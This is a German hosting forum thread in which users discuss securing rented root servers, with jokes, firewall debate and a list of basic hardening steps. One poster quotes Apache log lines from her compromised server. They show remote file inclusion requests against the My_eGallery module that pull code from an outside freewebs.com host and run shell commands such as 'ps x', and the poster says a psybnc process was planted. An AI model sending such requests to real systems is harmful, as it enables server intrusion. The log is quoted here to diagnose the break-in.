Server Hack ich könnte heulen :-(

[christian-wf]

O Gott, ich habe gerade festgestellt, dass Port 80 und 22 auf einem meiner Server offen sind. Da können ja gleich zwei Hacker auf einmal einbrechen. Was mache ich denn jetzt? Wie kann man am besten alle Ports für immer zumachen? :D

Indem Du das Netzwerkkabel abziehst! :D

[solution]

Achtung wichtige Datenverkehrsmeldung:

Code: Select all

Auf Port 3127 kommt Ihnen ein Mydoom entgegen, halten Sie sich möglichst recht, überholen Sie nicht. Wir informieren Sie wenn die Gefahr vorrüber ist.

[t-0ny]

Grundsätzlich brauche ich keinen Root.
Managed Server/Ready-to-run-Server/Business Server/usw., bei denen man sich nicht um die Sicherheit kümmern muss, sind viel komfortabler.
Leider ist das mit der Domainverwaltung dann so eine Sache. Man hat dann kein Confixx. Also muss man für seine Domains einen Root haben mit Confixx.
Inwie weit sind Root Server gefährdet, auf denen ausschließlich und wirklich nur Confixx läuft, um Domains zu verwalten mit ein paar HTML Homepages drauf?
Was müsste man machen um dort maximale Sicherheit zu erreichen?
Welche Firewall schlagen die Pros hier vor?

[giffi]

Sehr zu empfehlen ist "bRaIn 1.0"

SCNR

Giffi

[Joe User]

Inwie weit sind Root Server gefährdet, auf denen ausschließlich und wirklich nur Confixx läuft, um Domains zu verwalten mit ein paar HTML Homepages drauf?

Genau so, wie auch jeder andere öffentlich zugänglicher Server.

Welche Firewall schlagen die Pros hier vor?

http://faq.1und1.de/server/root_server/security/2.html

[t-0ny]

Nagut, bRaIn 1.0 ist installiert ;-) - aber das Einschalten des eigenen Hirnschmalzes hat noch keinen Hacker davon abgehalten, nicht doch Unfug zu treiben - da muß also echte Software her!

Als User von Managed Servern, Ready-to-run-Servern und anderen "fertigen" Servern bin ich allerhöchstens auf meiner Workstation mit dem Thema Firewall betraut. Man zieht sich Norton drauf, updated täglich, fertig.
Wie sieht es denn nun mit Firewalls für Root Server aus, bspw. von Strato. Wenn ich könnte würde ich ja für mein Confixx (von mir aus auch PLESK) nen Managed Server nehmen, aber scheinbar bietet das niemand an - gehen müsste das doch aber, oder??? Das wäre jetzt mal interessant zu wissen.
Ansonsten wäre ein Tip für ne gute FW für oben genannten Zweck sehr hilfreich - Danke!

[wgot]

Hallo,

Was müsste man machen um dort maximale Sicherheit zu erreichen?

Stecker des Netzwerkkabels ziehen. :lol:

Ansonsten wäre ein Tip für ne gute FW für oben genannten Zweck sehr hilfreich

Da ist jede gleich gut geeignet, Hauptsache sie kommt in einer Tüte. Die knüllst Du zusammen und steckst sie in das beim Steckerziehen freigewordene Loch. :oops:

Was ist am Link von Joe User sooo schwer zu verstehen? :roll:

Gruß, Wolfgang

[t-0ny]

Tja hinter dem Link stand nur keine Empfehlung für eine Firewall.

Das mit dem Stecker, respektive Steckdose und Tüte ist gar nicht so übel. Aber ich will den Strom nicht mit Zellulose bumsen, sondern eine Firewall auf nem Server installieren ... und die Frage war an Pros gerichtet, nicht an Schlauberger ;-)

Vieleicht erbarmt sich ja mal jemand und ringt sich n Tipp von den Lippen/Fingern.

[captaincrunch]

Tja hinter dem Link stand nur keine Empfehlung für eine Firewall.

Dann hast du den Inhalt entweder nicht gelesen oder einfach nur nicht verstanden...aber da du die Antwort eines "Pros" willst, wirst du auf mich ohnehin wohl nicht hören...

[athlux]

sondern eine Firewall auf nem Server installieren ... und die Frage war an Pros gerichtet, nicht an Schlauberger ;-)

Einsichtig bist Du ja nicht gerade.

Jetzt nochmal zum mitschreiben. Man benötigt normalerweise keine Firewall auf einem Linux Server.

Alle Dienste die von aussen ereichbar sein müssen benötigen so oder so einen offenen Port (beispielsweise Apache, ftp, ssh usw.) Wenn man diese Dienste regelmässig aktualisiert und richtig konfiguriert braucht man keine Firewall dafür.

Ansonsten kann man nur das hier nochmal wiederholen

Wird der Einsatz eines Paketfilters in Erwägung gezogen, sollte dieser gezielt für bestimmte Dienste eingesetzt und mit fundiertem Hintergrundwissen über das >> Internet Protokol und den >> Kommunikationsschichten für Internet Hosts konfiguriert werden.

[t-0ny]

Wenn man für einen Linux Root Server "eigentlich" keine Firewall braucht, frage ich mich warum es diesen Thread gibt :roll:

Es wird doch beschrieben, dass gemietete Server gehackt werden. Die Frage ist, wie man das verhindern kann. Mir wurde jetzt verbal mittels mehrerer Posts eingehämmert, dass es keiner Firewall bedarf um seinen Server zu sichern - was dann???

Bitte jetzt nicht schon wieder auf die 1&1 FAQ verweisen ... aber wenn hier wirklich wieder jemand sagen will, man braucht nichts machen, spring ich noch im Dreieck - dann würde es auch keine ServerHacks geben, wenn das alles so rosig ist.

Also teilt nun jemand sein Wissen mit mir und dem Rest des Threads ???

[Joe User]

Wie wäre es zur Abwechslung mal mit dem Querlesen des Security- und des Archiv-Forums? Selbstinitiative hat noch nie geschadet...

[cronet]

was willst du denn mit der Firewall schützen?

Ein offener Port hängt einfach mit einem Dienst zusammen. Willst du den Port schließen , schalte den Dienst ab.

Die Server werden gehackt, weil Anwendungen darauf laufen, wie z.B. PHP mit zuwenig Sicherheitsmechanismen, irgendwelche PHP Nuke Systeme, unsichere root passwörter, Systemdienste/Kernel nicht up to date, etc. Man kann da sicher noch viel mehr aufzählen.

Und im wenigsten falle hilft da auch eine Firewall...

Die Energien die man für die Firewall konfigurieren etc, aufwendet sollte man lieber dazu verwenden, Security Updates der Anwendungen/Dienste/ etc machen.

Gruß,
Alex

[kawfy]

1. Softwareinstallation aktuell halten
2. Log-Dateien regelmäßig auf Unregelmäßigkeiten prüfen
3. von Usern (=Kunden) installierte Skripte prüfen (aktuell: phpBB2)
4. sich aktiv über Sicherheitslücken informieren
5. Ã?berwachungsmechanismen implementieren
6. worst-scenario durchspielen und Notfallplan aufstellen
7. Backups

:!: Bitte Liste ergänzen

[keksdesgrauens]

naja ne firewall dient in erster linie dazu datenverkehr zu kontrollieren und nicht dienste zu schützen (so interpretiere ich das firewallkonzept im Kochbuch für linux)

[mikespi]

Ein interessantes Topic, angefangen bei A und Schluss bei Z.

[dodolin]

naja ne firewall dient in erster linie dazu datenverkehr zu kontrollieren und nicht dienste zu schützen

Kann man so nicht sagen, oder wozu dient ein Application Layer Gateway AKA Proxy?

[keksdesgrauens]

hm dann muss ich meine interpretation des firewallkonzept im Kochbuch für üderdenken btw dieses ein 2tes mal gründlicher lesen

[dodolin]

hm dann muss ich meine interpretation des firewallkonzept im Kochbuch für üderdenken btw dieses ein 2tes mal gründlicher lesen

Ich hab das Ding nicht gelesen, aber man sollte die Möglichkeit nicht grundsätzlich ausschließen, dass das Buch eine andere Sichtweise als die meine vertritt.

Um nochmal deine obige Aussage zu zitieren:

naja ne firewall dient in erster linie dazu datenverkehr zu kontrollieren und nicht dienste zu schützen

Wenn ich es mir genau überlege, dann _ist_ "Dienste schützen" ja auch eine Form von "Datenverkehr kontrollieren". Das nur als Anmerkung.

[andreab]

Hy Jungs ich bin begeistert .... Männer :-) stellt mann Ihnen eine Frage beantworten Sie es mit allem was Ihnen ein fällt :-) Ich hoffe Ihre könnt spaß ab. :-)

Nun Die Lösung war ein Modul ... ein Bildergalery.

Hier das ein auszug aus dem Log wie die "Hacker" es gemacht haben:

xxx.xxx.xxx.xxx - - [03/Dec/2004:10:11:24 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/jimsaku/inject. ... ;%20ps%20x HTTP/1.0" 200 2826 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [03/Dec/2004:10:12:01 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/jimsaku/inject. ... -9%2022527 HTTP/1.0" 200 1752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [03/Dec/2004:10:12:30 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/jimsaku/inject. ... p%20psybnc HTTP/1.0" 200 1805 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Ich gehe mal davon aus das ich euch experten :-) es nicht erkären brauch.

Intressant war auch ein netstat -tulpen hier ein auszug:

Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 0 2874 746/xinetd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 0 3386924 29569/mysqld
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 0 2873 746/xinetd
tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN 0 845402 7405/spamd
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 0 3414309 4933/perl
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN 0 3688 831/master
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 0 2875 746/xinetd
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 0 3685 831/master
tcp 0 0 :::80 :::* LISTEN 0 3344592 12725/httpd2-prefor
tcp 0 0 :::22 :::* LISTEN 0 11902 4035/sshd
tcp 0 0 :::443 :::* LISTEN 0 3344593 12725/httpd2-prefor
udp 0 0 0.0.0.0:10000 0.0.0.0:* 0 3414310 4933/perl
udp 105408 0 0.0.0.0:68 0.0.0.0:* 0 726 425/dhcpcd
udp 0 0 217.160.187.73:123 0.0.0.0:* 0 3654 802/ntpd
udp 0 0 127.0.0.1:123 0.0.0.0:* 0 3653 802/ntpd
udp 0 0 0.0.0.0:123 0.0.0.0:* 0 3652 802/ntpd

Intressant ist das sich der "Dienst" als sendmail tarnt und das verschieden Port benutzt werden die nicht notwendig sind.

Es wurde auch einen Cron jon als wrun erstellt.

So das war es erst ein mal schönes fest.

Gruß
andreaB

[wgot]

Hallo,

Männer :-)

Frauen - reden über alles und lassen das Wichtige weg.

Ich hoffe Ihre könnt spaß ab. :-)

Ich hoffe Du auch :lol:

/modules/My_eGallery/...

Wenn Du gleich geschrieben hättest daß My_Emmentaler auf der Kiste läuft hätte man Dir gleich schreiben können daß da große Löcher drin sind - ganz ohne Logfiles.

Gruß, Wolfgang

[Joe User]

/modules/My_eGallery/

http://www.rootforum.org/forum/viewtopic.php?t=21051